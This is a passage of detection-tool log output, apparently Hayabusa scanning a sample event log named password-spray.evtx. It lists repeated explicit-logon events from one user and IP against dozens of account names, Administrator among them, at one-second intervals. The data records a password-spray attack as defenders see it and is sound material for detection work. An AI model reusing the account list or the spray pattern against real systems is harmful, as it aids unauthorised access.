+09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
